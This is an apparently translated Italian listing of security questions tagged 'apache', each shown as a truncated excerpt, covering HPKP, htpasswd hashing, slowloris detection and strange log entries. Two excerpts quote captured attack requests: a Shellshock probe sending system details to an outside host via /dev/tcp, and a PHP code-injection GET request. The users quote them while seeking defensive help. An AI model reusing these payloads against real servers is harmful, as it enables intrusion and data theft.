Domande con tag 'apache'

domande con tag
2
risposte

HPKP e più certificati SSL

Alcune settimane fa, abbiamo abilitato l'intestazione HTTP Key Pinning sul nostro sito web. In base alle specifiche, abbiamo incluso non solo l'impronta digitale SHA-256 della nostra chiave RSA corrente, ma anche quella di una chiave di backup (...
posta 23.06.2015 - 10:10
1
risposta

Che tipo di richieste sono quelle?

Ricevo molte richieste come questa: ip-10-80-XXX-XXX.eu-west-1.compute.internal:80 110.249.208.XXX - - [11/Dec/2013:10:27:17 +0000] "GET http://mn.sina.com.cn/news/xianchang/2012-06-07/212535.html HTTP/1.1" 200 9515 "http://mn.sina.com.cn/ne...
posta 11.12.2013 - 11:35
2
risposte

È importante usare un hash lento in htpasswd?

È a mia conoscenza che lo scopo dei file .htpasswd è di limitare l'accesso ad alcuni file nel filesystem del server. Se un utente malintenzionato vi accede, probabilmente ha accesso anche a tutto il resto, quindi sembra che ci sia poco sens...
posta 28.04.2014 - 09:39
2
risposte

Lista di controllo per la sicurezza del sito web?

Sto costruendo un servizio web (un pannello di controllo per i client) (PHP su linux apache) e provo dal design per renderlo il più sicuro possibile, Qualcuno può fornirmi una sorta di elenco di cose su cui devo concentrarmi? Ho già implem...
posta 24.04.2015 - 11:20
1
risposta

Can Hacker Postare i dati tramite la richiesta GET?

Oggi abbiamo ricevuto la seguente richiesta nel file dei registri di accesso di Apache. "GET //?1=@ini_set(%22display_errors%22,%220%22);@set_time_limit(0);@set_magic_quotes_runtime(0);echo%20'-%3E%7C';file_put_contents(dirname($_SERVER%5B'SCR...
posta 04.08.2017 - 07:06
1
risposta

Rileva l'attacco di slowloris controllando il registro di Apache

Sto facendo la simulazione di un attacco slowloris su un server Debian con Apache. Anche le macchine attaccanti sono Debian. Per assicurarsi che l'attacco slowloris fosse efficace, vorrei accedere ai log di Apache e controllare se si è ver...
posta 20.03.2017 - 12:27
2
risposte

Perché StartTLS blocca la connessione ad apache

Quando eseguo questo comando: openssl s_client -connect my.server:443 -starttls smtp Perché Apache 2.4 & OpenSSL 1.0.1h (in esecuzione sul server 2008R2) non risponde più alla richiesta di altre macchine? Quello che vedo quando esegu...
posta 22.07.2015 - 20:11
1
risposta

Strana linea di log di apache [duplicato]

Ho appena trovato questa voce su uno dei miei server: 213.165.70.245 - - [17/Jun/2015:01:58:22 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo 109.234.106.8/ > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.208.7...
posta 17.06.2015 - 07:56
2
risposte

Protezione dei servizi Web Java richiamati dal sito Web in DMZ utilizzando i servizi Web per la comunicazione

Supponiamo di avere un'applicazione che esegue servizi Web Java in Apache Axis 2. In particolare, questi sono JAX-WS (Java API per servizi Web basati su XML). Attualmente questi servizi Web si trovano sullo stesso server Windows Server 2008 su c...
posta 07.03.2013 - 00:35
1
risposta

NGINX / TRACE HTTP

Ho un server http Nginx con HTTP TRACE abilitato. Un singolo nmap --script=http-methods.nse host.name fornisce questo risultato: Not shown: 988 closed ports PORT STATE SERVICE VERSION [...] 80/tcp open http...
posta 26.09.2012 - 05:02